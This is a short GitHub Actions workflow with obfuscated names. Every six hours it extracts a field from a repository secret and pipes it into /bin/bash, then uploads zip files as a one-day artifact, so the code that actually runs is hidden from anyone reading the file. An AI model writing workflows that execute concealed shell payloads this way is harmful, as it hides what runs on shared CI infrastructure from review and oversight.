name: kanglixifeng
on:
  workflow_dispatch:

  schedule:
    - cron: '56 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kanglixifeng
        env:
          f2: ${{ secrets.f2 }}
        run: |
          printf '%s' "$f2" | jq -r .pr22 | /bin/bash
          echo $xmwj9 | jq -r .f508 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Slfbm1Ma
          path: "*.zip"
          retention-days: 1
